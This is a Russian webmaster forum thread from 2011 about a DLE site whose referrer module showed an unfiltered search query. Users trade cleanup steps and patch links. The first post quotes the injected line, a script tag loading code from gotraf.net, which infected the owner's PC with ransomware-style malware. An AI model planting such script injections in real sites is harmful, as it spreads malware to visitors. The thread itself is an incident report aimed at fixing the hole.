Как я словил вирус на комп от своего сайта
Страницы: 1
Как я словил вирус на комп от своего сайта
Открыл я вчера в IE свой сайт, и IE спросил у меня разрешение на запуск скрипта со стороннего сайта. Перерыл в (просмотр html-кода) все скрипты на странице, и нашёл в выводе модуля переходы (у меня dle) такую строку
Код
» <a href="/">g<sc ript src=http://gotraf.net/in.php?id=234></script></a><br />
Как я понял, кто то перешёл на мой сайт по запросу g<sc ript src=http://gotraf.net/in.php?id=234></script>. Пока пытался понять либо сайт пытаются взломать либо вирус внедрить, уже всплыло окно, сообщающее мне, что я должен денег. Что то типа за то, что распостранял порнуху. Нод 32 с последними базами отмолчался в этот момент. Ну вирусняк то стандартный, правда всё равно день на него убил, но напрягает эта уязвимость. И потом, если бот ПС в такой момент на сайт заглянет, ведь сайт в распостранении вирусов обвинят. И чё делать? модуль убирать или может какие его доработки существуют? Вобщем, если кто сталкивался, отпишитесь, буду признателен.
Изменено: daden11 - 12 Июля 2011 17:56

Бесплатная контекстная реклама

У меня тоже такое было, всё почистил. Но вот как избавиться от етой уязвимости?
А что вы там почистили? у меня траф небольшой, но минут за 10 само ушло (показываются 5 последних переходов).
Изменено: daden11 - 12 Июля 2011 22:37
вроде нашёл решение _http://my-dle.ru/1352-nedostatochnaya-filtraciya-pri-formirovanii-bloka-v-module-perehody.html
Блин, накаркал. Яша заметил эту шляпу,
Рисунок

и трафик сразу вниз пошёл (на картинке пользователи онлайн)
Рисунок

в ВМ появилось предупреждение о вирусе с кнопкой перепроверить. Написано,что перепроверка идёт пару дней. Вылезу ли из этого дерьма без потерь или нет, время покажет. Короче, думаю, что всё это происки конкурентов.
Изменено: daden11 - 13 Июля 2011 16:34
Цитата
daden11 пишет:
А что вы там почистили? у меня траф небольшой, но минут за 10 само ушло (показываются 5 последних переходов).

Нужно через поиск у админ-панели у настройке етого модуля найти переход с етим запросом и удалить его. После етого у меня антивирус перестал выдавать сообщение о заражённом сайте.
Цитата
daden11 пишет:
вроде нашёл решение _http://my-dle.ru/1352-nedostatochnaya-filtraciya-pri-formirovanii-bloka-v-module-perehody.html

Не понимаю какая польза от етого фикса, ведь он в коде заменяет ети знаки "{" и "}", а их у вредоносном коде нету.
Цитата
daden11 пишет:
И чё делать? модуль убирать

Яша за него уже наказывае... smile:)
Цитата
maxim maxim пишет:
Цитата
daden11 пишет:
вроде нашёл решение _http://my-dle.ru/1352-nedostatochnaya-filtraciya-pri-formirovanii-bloka-v-module-perehody.html

Не понимаю какая польза от етого фикса, ведь он в коде заменяет ети знаки "{" и "}", а их у вредоносном коде нету.

я ещё нашёл исправления от автора модуля _http://dle-solutions.ru/dle/bags/150-nedostatochnaya-filtraciya-v-module-perehody.html там вроде корректно.
Цитата
Arte пишет:
Яша за него уже наказывае..

я вывод модуля переходы сделал сразу за topnews, и в коде он отображается так же как и topnews. Не думаю, что ПС его определят
Цитата
daden11 пишет:
я ещё нашёл исправления от автора модуля _http://dle-solutions.ru/dle/bags/150-nedostatochnaya-filtraciya-v-module-perehody.html там вроде корректно.

Вот за ето спасибо smile:D
Страницы: 1
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
16:22 Виляет ли реклама от adsense на развитие сайта? 
16:05 Блог для интернет магазина 
15:59 Более 100 уникальных статей а трафика почти нет. 
15:57 Служба поддержки Гугл 
15:47 Яндекс тИЦ 03.12.2016 
15:39 Adsense личный опыт 
14:00 Апдейт Яндекса 04.12.2016 
15:14 200 открытых анкорных ссылок всего за 100 рублей 
14:55 Продам ссылки для новостных сайтов 
14:23 Продам домены РУС 
12:43 Создание сайтов под различные ПП - от 7$ + Отзывы, Гарантии. 
11:53 Вакансии: Операторы и редакторы по обработке статей из вебархива 
11:49 разработка мобильных приложений 
11:46 Срочно продам два готовых форума о соц сетях и заработке! 
15:31 Роскомнадзор отвел Google три месяца 
15:25 Книга "Просветление за полчаса" 
14:20 Мультиязычность сайта - хорошо или плохо? 
13:26 Кто-нибудь работал с directadvert.ru??? 
13:12 Кто переведет текст с рус на енг 
12:31 Непонятки с адсенс 
12:15 Гугл не хочет индексировать